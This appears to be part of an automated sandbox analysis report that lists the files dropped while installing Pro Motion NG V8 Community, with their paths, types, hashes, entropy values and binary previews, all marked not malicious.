Preview:	x.uV.n.6.}......h..k.8m!`mIF.X..9.E....a.....e.~Y..I...EY.e..sx4...P....$.tK4.....3.O....X.OAh.........-FC.L....2..e..o..no.....2..1.0U< B....f.A.^.F..4.DL...q.>.F&..<.....vLS.._k.CT.. .. J..\|.E..}%s.q^AS.x0...`..\...L.......M..Ch...a......{}I.)a\|....gRd..K...e...".h..........N...m.. ........./..\^P^..[_.<./..CE.CE.ZE.CE.KE.SE.KE.KE.SE.KE..T.:U....m..k...../...ooh.4.....A.j..8.T..5..B-.....-4.C...:0....5?YO..C......._mD.Y1...V.&..1...R0....<....s.I..4..Y..}..Qt..a.n8....i.2.N........x....P.....T..sXF..%H.."...i..T`@.@..w.a.....L..v..1b.<.v.a../....=..=<....=...9]....d....w...b4.3.>.<.$.F...p...kE..)7...o)8.....:.V....>..y..xD....j....P.\.w.@..F..:../e.r..m.Vd+..T-.ik&y....e.m.I..u...O.N....w...\|..^?.l.G.l...s..j..FF.'g{..N....@K"7..!\e.q.....3...7..8.3..k.A.B,..".mn....94f..=...&\|.s1..!...@..).~"-.&..z...-.....e.4.C...Q..-..,V.S2-)....bS..Y..../".......c`........

C:\Users\user\AppData\Local\Temp\F98E845BE4684F359B0039787E012B1D.tmp

Download File

Process:	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe
File Type:	data
Category:	dropped
Size (bytes):	3538412
Entropy (8bit):	3.5005706825100904
Encrypted:	false
SSDEEP:	24576:gVkdvyzrtnS7B3eIJd7IHFYEqOkrX+azQy+AQs3QUFCJJssee5L3dInEFghk4GGt:gNwBJWIiR5TbNPYRjBBi8N
MD5:	A749D4674B4377DB623BED99890AE7C8
SHA1:	AEA26F213D165A775DBABBCDB83941BDEDBEDA6E
SHA-256:	B27D2F5992B264C0839F1919C38391449FF7E380A618C1324541947CFAC12272
SHA-512:	4564083768107AA430A7D30696A8B394023216AE1E1EE8707CA1F77B5B1C716FCD1CE703A234AC4B0EFC4AC4D29C9FDE3ECA8C1187AFAAA844CE9C4CB88197BD
Malicious:	false
Reputation:	low
Preview:	S.y.s.t.e.m.S.y.s.t.e.m...p.a.s.T.O.b.j.e.c.t...T.C.u.s.t.o.m.A.t.t.r.i.b.u.t.e...W.e.a.k.A.t.t.r.i.b.u.t.e...V.o.l.a.t.i.l.e.A.t.t.r.i.b.u.t.e...T.I.n.t.e.r.f.a.c.e.d.O.b.j.e.c.t...T.M.a.r.s.h.a.l...C.l.o.s.e.H.a.n.d.l.e.G.e.t.S.t.d.H.a.n.d.l.e.C.r.e.a.t.e.F.i.l.e.G.e.t.F.i.l.e.S.i.z.e.G.e.t.F.i.l.e.T.y.p.e.R.e.a.d.F.i.l.e.S.e.t.E.n.d.O.f.F.i.l.e.S.e.t.F.i.l.e.P.o.i.n.t.e.r.W.r.i.t.e.F.i.l.e.R.e.m.o.v.e.D.i.r.e.c.t.o.r.y.G.e.t.C.u.r.r.e.n.t.D.i.r.e.c.t.o.r.y.W.S.e.t.C.u.r.r.e.n.t.D.i.r.e.c.t.o.r.y.W.F.i.n.d.C.l.o.s.e.F.i.n.d.F.i.r.s.t.F.i.l.e.I.n.i.t.i.a.l.i.z.e.C.r.i.t.i.c.a.l.S.e.c.t.i.o.n.E.n.t.e.r.C.r.i.t.i.c.a.l.S.e.c.t.i.o.n.L.e.a.v.e.C.r.i.t.i.c.a.l.S.e.c.t.i.o.n.D.e.l.e.t.e.C.r.i.t.i.c.a.l.S.e.c.t.i.o.n.C.r.e.a.t.e.T.h.r.e.a.d.G.e.t.C.u.r.r.e.n.t.T.h.r.e.a.d.I.d.S.w.i.t.c.h.T.o.T.h.r.e.a.d.E.x.i.t.T.h.r.e.a.d.E.x.i.t.P.r.o.c.e.s.s.R.a.i.s.e.E.x.c.e.p.t.i.o.n.R.t.l.U.n.w.i.n.d.U.n.h.a.n.d.l.e.d.E.x.c.e.p.t.i.o.n.F.i.l.t.e.r.G.e.t.L.a.s.t.E.r.r.o.r.F.r.e.e.L.i.b.r.a.r.y.L.o.a.d.

C:\Users\user\AppData\Local\Temp\FC140C4738794FD38CB5E2739A3BFF17.tmp

Download File

Process:	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2124
Entropy (8bit):	5.25763476531683
Encrypted:	false
SSDEEP:	48:1Itf55M9CG1rKzgtk/y3TO4+Ob6GXk/JzenCkj+pTFw:1Gf55M9CG1rKzgtkgr+ObiynCkj+lG
MD5:	F547953667EAFF3E50FB9CE3E0032F8C
SHA1:	7B59E0C9F2DC93CEAEF2F0C44E8D8C0081924A1F
SHA-256:	435D3F946A6781AF288A3F29E50535713B2D8EA5D0EEF703CBC7BD20FF0D3969
SHA-512:	A3C62D47178DC92BFAA8BD0C22EDCA6683E5C45869CBCB0995620EA53B6F482E433A5DD9B701732460773E171D43E28189B33B6FCCFE329105C5F1495BC41967
Malicious:	false
Reputation:	low
Preview:	.Activate=1..atFixSafeCallException=1..atVCL=1..atWin32=1..cfoReduceFileSize=0..CompatibilityMode=0..csoCaptureOnlyModuleExceptions=0..DeleteMapAfterCompile=0..dpDLLExports=0..dpMicrosoft=1..Encrypt Password=""..EurekaLog Version=7007..Filters_0_Action=3..Filters_0_Active=1..Filters_0_BugID=0..Filters_0_Class=""..Filters_0_Context=0..Filters_0_Dialog=" "..Filters_0_Handled=0..Filters_0_Handler=1..Filters_0_Message=""..Filters_0_Module=""..Filters_0_Properties=""..Filters_0_Routine=""..Filters_0_Type="ESimpleXMLWError"..Filters_0_Unit=""..Filters_0_URL=""..Filters_1_Action=3..Filters_1_Active=1..Filters_1_BugID=0..Filters_1_Class=""..Filters_1_Context=0..Filters_1_Dialog=" "..Filters_1_Handled=0..Filters_1_Handler=1..Filters_1_Message=""..Filters_1_Module=""..Filters_1_Properties=""..Filters_1_Routine=""..Filters_1_Type="EFOpenError"..Filters_1_Unit=""..Filters_1_URL=""..FiltersCount=2..idEurekaLog=1..idEurekaLogDetailed=1..idMSClassic=1..idStepsToReproduce=1..InjectCode=1..InjectInfo

C:\Users\user\AppData\Local\Temp\ICACHE-7E79BEA3.tmp

Download File

Process:	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe
File Type:	data
Category:	dropped
Size (bytes):	262144
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	EC87A838931D4D5D2E94A04644788A55
SHA1:	2E000FA7E85759C7F4C254D4D9C33EF481E459A7
SHA-256:	8A39D2ABD3999AB73C34DB2476849CDDF303CE389B35826850F9A700589B4A90
SHA-512:	9DD0C30167FBEAF68DFBBAD8E1AF552A7A1FCAE120B6E04F1B41FA76C76D5A78922FF828F5CFFD8C02965CDE57D63DCBFB4C479B3CB49C9D8107A7D5244E9D03
Malicious:	false
Reputation:	low
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ILIST-188D74ED.tmp

Download File

Process:	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe
File Type:	data
Category:	dropped
Size (bytes):	262144
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	EC87A838931D4D5D2E94A04644788A55
SHA1:	2E000FA7E85759C7F4C254D4D9C33EF481E459A7
SHA-256:	8A39D2ABD3999AB73C34DB2476849CDDF303CE389B35826850F9A700589B4A90
SHA-512:	9DD0C30167FBEAF68DFBBAD8E1AF552A7A1FCAE120B6E04F1B41FA76C76D5A78922FF828F5CFFD8C02965CDE57D63DCBFB4C479B3CB49C9D8107A7D5244E9D03
Malicious:	false
Reputation:	low
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\3b2df6.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {712FA1FF-5EDD-4B8A-A341-2347CE5946D3}, Number of Words: 10, Subject: Pro Motion NG - V8 Community, Author: cosmigo, Name of Creating Application: Pro Motion NG - V8 Community, Template: ;1033, Comments: cosmigo, Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Thu Sep 14 20:10:25 2023, Number of Pages: 200
Category:	dropped
Size (bytes):	14749696
Entropy (8bit):	7.964849722733625
Encrypted:	false
SSDEEP:	393216:bQcblwAxiRsytVOtSOuySa3/B5Qw0a4/AlwZnb87:lbys0MSOuySuLQPa7gA
MD5:	96D99E6C2E7C358B9D663595D3AF5F27
SHA1:	07E7C360B6FB5BF7C124AA6156B9D3C73D0DD9EC
SHA-256:	301432E6053A0F092E8F5137A97EF3543934E0F8E200BD0C7844886E4C72E7E9
SHA-512:	13193D767B2C6B4AAACF4D0B6C6E87428B5431C85B1730F54C5999DF11F573826B1DEA22D85028A5D52AAAA43148B1F23B19078F023AA067B48C199F4DD2954E
Malicious:	false
Reputation:	low
Preview:	......................>...........................................^...........m.......m.......................................S...T...~................................................................................................................................... ...!..."...#...$...%...&...'...(...)......+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...............H...............#...7........................................................................................... ...!..."...-...4...%...&...'...(...)......+...,.........../...0...1...2...3...8...5...6...>...A...9...:...;...<...=...L...?...@...M...B...C...D...E...F...G...H...I...J...K...u...U...N...I...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...........o...p...q...r...s...t...u...v...w...x...y...z...

C:\Windows\Installer\MSI3086.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.4696654484377945
Encrypted:	false
SSDEEP:	6144:waFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOlKmN9ysU5pvs8g73iK:JYL9HXVW0xOA+KlZC4vA55s8g73iK
MD5:	A9941233B9415B479D3B4F3732161EAB
SHA1:	CB2D99AF52B3B1C712943B13E45D85C80C732E57
SHA-256:	CE34CC14E8D26119E1BF28A3A8368DA6E10D13851004E2675976C5AD58B122E2
SHA-512:	CFD6C425587E5E7C57B6F4655E2A48C871313E2BACF63CC0955CCAE1A384610644F26AA76BEE0A2A327CD77C2AE7DEF8EA9CB0C7C7C87FAB1C8196BAC82037F7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............u.u.u.L.v.u.L.p.4.u.;.q.u.;.v.u.;.p..u.L.q.u.L.s.u.L.t.u.t.!.u..\|...u..u.u...u...u..w.u.Rich..u.........PE..L......d.........."!...$.>...........Y.......P...............................0............@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI3133.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.4696654484377945
Encrypted:	false
SSDEEP:	6144:waFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOlKmN9ysU5pvs8g73iK:JYL9HXVW0xOA+KlZC4vA55s8g73iK
MD5:	A9941233B9415B479D3B4F3732161EAB
SHA1:	CB2D99AF52B3B1C712943B13E45D85C80C732E57
SHA-256:	CE34CC14E8D26119E1BF28A3A8368DA6E10D13851004E2675976C5AD58B122E2
SHA-512:	CFD6C425587E5E7C57B6F4655E2A48C871313E2BACF63CC0955CCAE1A384610644F26AA76BEE0A2A327CD77C2AE7DEF8EA9CB0C7C7C87FAB1C8196BAC82037F7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............u.u.u.L.v.u.L.p.4.u.;.q.u.;.v.u.;.p..u.L.q.u.L.s.u.L.t.u.t.!.u..\|...u..u.u...u...u..w.u.Rich..u.........PE..L......d.........."!...$.>...........Y.......P...............................0............@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI3154.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.4696654484377945
Encrypted:	false
SSDEEP:	6144:waFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOlKmN9ysU5pvs8g73iK:JYL9HXVW0xOA+KlZC4vA55s8g73iK
MD5:	A9941233B9415B479D3B4F3732161EAB
SHA1:	CB2D99AF52B3B1C712943B13E45D85C80C732E57
SHA-256:	CE34CC14E8D26119E1BF28A3A8368DA6E10D13851004E2675976C5AD58B122E2
SHA-512:	CFD6C425587E5E7C57B6F4655E2A48C871313E2BACF63CC0955CCAE1A384610644F26AA76BEE0A2A327CD77C2AE7DEF8EA9CB0C7C7C87FAB1C8196BAC82037F7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............u.u.u.L.v.u.L.p.4.u.;.q.u.;.v.u.;.p..u.L.q.u.L.s.u.L.t.u.t.!.u..\|...u..u.u...u...u..w.u.Rich..u.........PE..L......d.........."!...$.>...........Y.......P...............................0............@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI3174.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.4696654484377945
Encrypted:	false
SSDEEP:	6144:waFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOlKmN9ysU5pvs8g73iK:JYL9HXVW0xOA+KlZC4vA55s8g73iK
MD5:	A9941233B9415B479D3B4F3732161EAB
SHA1:	CB2D99AF52B3B1C712943B13E45D85C80C732E57
SHA-256:	CE34CC14E8D26119E1BF28A3A8368DA6E10D13851004E2675976C5AD58B122E2
SHA-512:	CFD6C425587E5E7C57B6F4655E2A48C871313E2BACF63CC0955CCAE1A384610644F26AA76BEE0A2A327CD77C2AE7DEF8EA9CB0C7C7C87FAB1C8196BAC82037F7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............u.u.u.L.v.u.L.p.4.u.;.q.u.;.v.u.;.p..u.L.q.u.L.s.u.L.t.u.t.!.u..\|...u..u.u...u...u..w.u.Rich..u.........PE..L......d.........."!...$.>...........Y.......P...............................0............@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI31B3.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.4696654484377945
Encrypted:	false
SSDEEP:	6144:waFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOlKmN9ysU5pvs8g73iK:JYL9HXVW0xOA+KlZC4vA55s8g73iK
MD5:	A9941233B9415B479D3B4F3732161EAB
SHA1:	CB2D99AF52B3B1C712943B13E45D85C80C732E57
SHA-256:	CE34CC14E8D26119E1BF28A3A8368DA6E10D13851004E2675976C5AD58B122E2
SHA-512:	CFD6C425587E5E7C57B6F4655E2A48C871313E2BACF63CC0955CCAE1A384610644F26AA76BEE0A2A327CD77C2AE7DEF8EA9CB0C7C7C87FAB1C8196BAC82037F7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............u.u.u.L.v.u.L.p.4.u.;.q.u.;.v.u.;.p..u.L.q.u.L.s.u.L.t.u.t.!.u..\|...u..u.u...u...u..w.u.Rich..u.........PE..L......d.........."!...$.>...........Y.......P...............................0............@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI3F22.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	602432
Entropy (8bit):	6.4696654484377945
Encrypted:	false
SSDEEP:	6144:waFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOlKmN9ysU5pvs8g73iK:JYL9HXVW0xOA+KlZC4vA55s8g73iK
MD5:	A9941233B9415B479D3B4F3732161EAB
SHA1:	CB2D99AF52B3B1C712943B13E45D85C80C732E57
SHA-256:	CE34CC14E8D26119E1BF28A3A8368DA6E10D13851004E2675976C5AD58B122E2
SHA-512:	CFD6C425587E5E7C57B6F4655E2A48C871313E2BACF63CC0955CCAE1A384610644F26AA76BEE0A2A327CD77C2AE7DEF8EA9CB0C7C7C87FAB1C8196BAC82037F7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............u.u.u.L.v.u.L.p.4.u.;.q.u.;.v.u.;.p..u.L.q.u.L.s.u.L.t.u.t.!.u..\|...u..u.u...u...u..w.u.Rich..u.........PE..L......d.........."!...$.>...........Y.......P...............................0............@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI401D.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	4081
Entropy (8bit):	5.522999675196545
Encrypted:	false
SSDEEP:	48:UkQElGLIYzdzU9el+DbIrGR1vO8wbcvxosjEP3qLXORQJJUSdYKz5CLJTrr7hAVy:ULLfl8sUgyUQJJUSdYKMJ5AysZZuTHTH
MD5:	D4DF9BCFD80613B117A13E9AD1928360
SHA1:	22B8C227FF9B8D3034C9E3B86549A07274466F31
SHA-256:	F3CBAEC999999A5609337149F42235CD2D7465AEA0752AC66EEFD9B03246B169
SHA-512:	14EF2D165253F1A2027B971666B222B16B651FAE025FA5ADA475EF869B5D7DA9295B80367ADEB743938874EA9A39078F161D6B154F42CFCF8FDAAC5A53734C76
Malicious:	false
Reputation:	low
Preview:	...@IXOS.@.....@.Z/W.@.....@.....@.....@.....@.....@......&.{1CC170D0-5392-404D-A691-410183B16E39}..Pro Motion NG - V8 Community..promot_s.msi.@.....@.....@.....@........&.{712FA1FF-5EDD-4B8A-A341-2347CE5946D3}.....@.....@.....@.....@.......@.....@.....@.......@......Pro Motion NG - V8 Community......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{BACEFD7C-2242-4BDA-88CA-278EA0FBAC71};.C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\.@.......@.....@.....@......&.{E1F4536E-7D2A-4F44-81EE-727B5F105E80}9.01:\Software\cosmigo\Pro Motion NG - V8 Community\Version.@.......@.....@.....@......&.{5D6E9285-4329-458E-B15D-3C8136F01048}F.C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ApiCore.dll.@.......@.....@.....@......&.{C6DC23EE-92A9-49EA-992A-ABF476CB0AE8}I.C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\wPDFView03.dll.@.......@..

C:\Windows\Installer\SourceHash{1CC170D0-5392-404D-A691-410183B16E39}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.164095460607582
Encrypted:	false
SSDEEP:	12:JSbX72FjYSAGiLIlHVRpfh/7777777777777777777777777vDHFyMtpwl0i8Q:JlQI5bokF
MD5:	87397842949845020455B9A4BA5A67EA
SHA1:	3E5CB92F5ABDF41534914DF97CC040589BA7EB22
SHA-256:	CE54D5AA8D6CEB07071D0502566680818ABF76356964A4E6425CB72FE0F713DE
SHA-512:	40310D0812A7978B8F8374668BDAF9A98DC27877EE07553766F5CBA0E45BEF357DB1D00B9872B796F07EDFB1F028DCDE0A8E2D61D2074F5B08B71834E020F0AA
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5690340018537454
Encrypted:	false
SSDEEP:	48:H8PhTuRc06WXJajT5wVWd9CSC9wAErCyHTLX09CSC9eT0:GhT1RjTM1zwCSXl
MD5:	215F2393D8F9A25B30C72E2EE28D663C
SHA1:	D881A5EBCBCA23BBD70ADEE0CD7C8DE457235F6F
SHA-256:	4599FB328929EAD1FEA54164BB2E313C58F79C8DF09EF43A2DF0E433911058EC
SHA-512:	559BE698431A0A019E8C3652D78F7775DB988CB8A542E95B6E842499C8EEB252685A515F1280C982B720AF6E3D95191A27B710331C04A4F2FFDA502C97EBFF0F
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	312775
Entropy (8bit):	5.390418158892248
Encrypted:	false
SSDEEP:	3072:4gBDx9g8hHVfgFA5Zds8ajJw9ZCwoTv9eKbHdUul/51LriiOc7BLZmaxk7VPhAD3:UmD8ln/F
MD5:	E2476E42621367590B0C94CDBFD776F8
SHA1:	211A2677BC4CE6F2620AF4A9AC96F49497BB34C8
SHA-256:	0F97E6301DF46020812ADFEA6263ED7C54B8492CCF481037222639B41A1DF74A
SHA-512:	C72B37BAADBD08E8D8D86FF1F39F60BD567D6D1468C68A9542FF3003A652E64B1EF34ABC13D08675AD67E2143C922429C58A7EEDF4B816BF95AD278711252934
Malicious:	false
Reputation:	low
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 10:38:04.497 [4552]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Outlook, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:38:04.513 [4552]: ngen returning 0x00000000..07/23/2020 10:38:04.559 [4480]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Word, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:38:04.559 [4480]: ngen returning 0x00000000..07/23/2020 10:38:04.622 [4256]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Common.Implementation, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:38:04.622 [

C:\Windows\Temp\~DF0AF7B79F23C48FB7.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.07104899971626105
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKOpzk44o4Vky6lw:2F0i8n0itFzDHFyiw
MD5:	F04664E4F80CC6EE7759826D10EEDA99
SHA1:	F96BCDC58B180B683FFB5063EBFE6E9953CABA9E
SHA-256:	E86946E10A38AC8036C81D9F06BC7A2C1DE1158E8AC26DEA20F80C3EFC138D97
SHA-512:	EA89985CBE3F2B33FAA1FCAE9409277B0D7698DF1554DD1337CB5B4EFEEA3C46CC9EC5A268B8867103DCA11C1BE3A88C31232AFFFF8983C09FEDF7FF69F3B6A9
Malicious:	false
Reputation:	low
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF14D42577481CE94A.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF240371D4FD645E46.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF6C97059AB4FF524D.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.13910641974076093
Encrypted:	false
SSDEEP:	24:ZfuTxY9CipVY9oY9CipVY9wAEV0yjCyHnTVQwGuR80EIh+kn49I:huTu9CSC999CSC9wAErCyHTLXThr
MD5:	BA0FFF6EA7E986E48E01B8D160795BD3
SHA1:	857FC674C41E0D758984C8FC0A7A545D1ECAF20A
SHA-256:	2B690B929886E6FD4CBD97D4ABE84FD1D99E5287C0642BB34CF83D99F80BD533
SHA-512:	2AFD34B2E034D39DD0357873C60626D35EB0761D02454F2C57CA195AAC2BA13E36878498A823EAEA418ADCEB0C0742052B4B51C9B340FBE11F663657E03C3ACF
Malicious:	false
Reputation:	low
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF6F2A12836D175ABA.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF91F7975B5F14C3FA.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2566392844220813
Encrypted:	false
SSDEEP:	48:W8LuqK+CFXJtT5RVWd9CSC9wAErCyHTLX09CSC9eT0:jLUVTl1zwCSXl
MD5:	1182638BD371174727A345E5BF2FCF15
SHA1:	DBB57C24C7326A8C6BAA5A3B6118C1FA60133909
SHA-256:	5FEFAB79655E08F56BFD0478CAD8E5ADC791DD2B8600F6E76ED3E1192D3239B7
